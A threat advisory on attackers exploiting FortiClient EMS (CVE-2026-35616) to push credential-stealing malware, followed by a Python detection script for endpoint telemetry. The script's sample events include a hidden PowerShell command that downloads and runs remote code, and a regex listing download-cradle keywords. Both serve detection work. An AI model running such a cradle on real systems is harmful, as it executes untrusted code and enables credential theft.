Summary Points
- Threat actors exploited CVE-2026-35616 to gain pre-authentication API access, using compromised FortiClient EMS to deliver credential-stealing malware via legitimate updates and PowerShell scripts.
- They modified EMS configurations to push malicious scripts across managed endpoints, enabling widespread execution without additional intrusion points.
- The malware, disguised as a FortiClient update, harvests sensitive data from browsers and exfiltrates it, while session cookies and credentials could enable further attacks on cloud and internal resources.
Threat Overview, Techniques, and Targets
Threat actors are exploiting a critical vulnerability in FortiClient Endpoint Management Server (EMS) to deliver credential-stealing malware. The flaw, tracked as CVE-2026-35616, gives attackers unauthenticated API access and lets them escalate privileges. Because exploitation occurs before authentication, the attackers can modify the EMS configuration directly; those changes both conceal the malicious activity and push malicious scripts to managed endpoints.
The attackers disguise malware as legitimate Fortinet updates, such as “FortiEndpoint_Patch.exe.” They use trusted management pathways to silently execute PowerShell commands, which download and run malicious payloads. This malware can harvest sensitive data like passwords, cookies, and personal details from browsers. The malware also exfiltrates data to an external server via HTTP POST requests. The activity was observed in May 2026.
The actors target organizations that use FortiClient EMS to manage endpoints. Because the attack manipulates EMS configurations, all managed devices become potential targets. This allows widespread infection across an organization’s network.
Impact, Security Implications, and Remediation Guidance
The attack can have serious impacts. Threat actors can access sensitive information stored on endpoints. Since the malware can harvest login data, they may gain access to internal applications, cloud services, and other protected resources. The use of legitimate management tools makes detection difficult. Additionally, the malware’s exfiltration methods can enable long-term follow-on access.
Security implications include an increased risk of data theft and network compromise. Because stolen session cookies and credentials let the malware's operators bypass security controls such as MFA, organizations face a higher likelihood of persistent, follow-on access.
Detailed remediation guidance is not provided in the current information; organizations should seek advice from Fortinet or relevant security authorities. FortiClient EMS should be updated to version 7.4.7 or later, as the flaw has been addressed in that release. Regularly reviewing and monitoring EMS configurations for unauthorized changes can also help mitigate risk.
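The two observable behaviours described above (the management agent launching PowerShell download-and-execute commands, and an unsigned "Forti*Patch" binary running from a user-writable directory) lend themselves to endpoint detection rules. The script below is an added example written for this page; it is not Fortinet's code or a vendor-published rule. It runs over constructed Sysmon-style process-creation events embedded in the file. The agent process name in MANAGEMENT_PARENTS and the install path in the sample events are placeholders (assumptions) that must be replaced with the real EMS agent executable name and path in your environment; the lure file name FortiEndpoint_Patch.exe is the one cited in the write-up, and the regex generalises to similarly named lures.

```python
"""Detection sketch for the EMS-abuse pattern described in the write-up.

Added example, not Fortinet's code or a vendor rule. Operates on constructed
process-creation events (Sysmon Event ID 1 style fields) embedded below.
"""
import re
from dataclasses import dataclass

# ASSUMPTION: placeholder name. Replace with the actual EMS/FortiClient agent
# process name(s) observed as the parent of pushed scripts in your telemetry.
MANAGEMENT_PARENTS = {"fortiemsagent_placeholder.exe"}

POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Common PowerShell download-and-execute indicators (defensive signature).
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"net\.webclient|-enc(odedcommand)?\b|frombase64string)",
    re.IGNORECASE,
)

# File names styled as Fortinet patches/updates. "FortiEndpoint_Patch.exe" is
# the lure named in the write-up; the pattern generalises to similar names.
LURE_NAME = re.compile(r"^forti\w*(patch|update)\w*\.exe$", re.IGNORECASE)

# Directories a standard user can write to (a legitimate agent update would
# normally execute from a protected program directory).
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads)\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    signed: bool = True  # Authenticode status as recorded by the sensor


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> list:
    """Apply both rules to one event and return any findings."""
    findings = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)

    # Rule 1: the management agent spawning a PowerShell download cradle.
    if (img in POWERSHELL and parent in MANAGEMENT_PARENTS
            and DOWNLOAD_CRADLE.search(ev.command_line)):
        findings.append(Finding(ev.host, "ems_pushed_download_cradle", ev.command_line))

    # Rule 2: unsigned Forti*Patch/Update binary executing from a user-writable path.
    if LURE_NAME.match(img) and USER_WRITABLE.search(ev.image) and not ev.signed:
        findings.append(Finding(ev.host, "unsigned_forti_lure_binary", ev.image))

    return findings


def scan(events) -> list:
    """Run evaluate() over a batch of events and collect findings."""
    out = []
    for ev in events:
        out.extend(evaluate(ev))
    return out


# Constructed sample telemetry (not real logs; paths and host names are made up).
SAMPLE_EVENTS = [
    # Agent placeholder launches PowerShell with a download cradle -> Rule 1.
    ProcessEvent("ws-01", r"C:\Program Files\EMSAgentPlaceholder\fortiemsagent_placeholder.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://203.0.113.10/u')\""),
    # Unsigned lure binary dropped into %TEMP% -> Rule 2.
    ProcessEvent("ws-01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Users\alice\AppData\Local\Temp\FortiEndpoint_Patch.exe",
                 r"C:\Users\alice\AppData\Local\Temp\FortiEndpoint_Patch.exe", signed=False),
    # Benign interactive PowerShell -> no finding.
    ProcessEvent("ws-02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Process"),
    # Signed updater from a protected directory -> no finding.
    ProcessEvent("ws-03", r"C:\Program Files\EMSAgentPlaceholder\updater.exe",
                 r"C:\Program Files\EMSAgentPlaceholder\FortiClientUpdate.exe",
                 "FortiClientUpdate.exe /silent", signed=True),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.detail}")
```

Rule 1 keys on the parent/child relationship rather than on the cradle alone, which keeps interactive administrator use of the same cmdlets from firing; Rule 2 uses the signature status and execution directory together, because a genuine agent update would be signed and run from its program directory. Both rules are starting points to tune against your own EMS telemetry, not a complete signature set.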
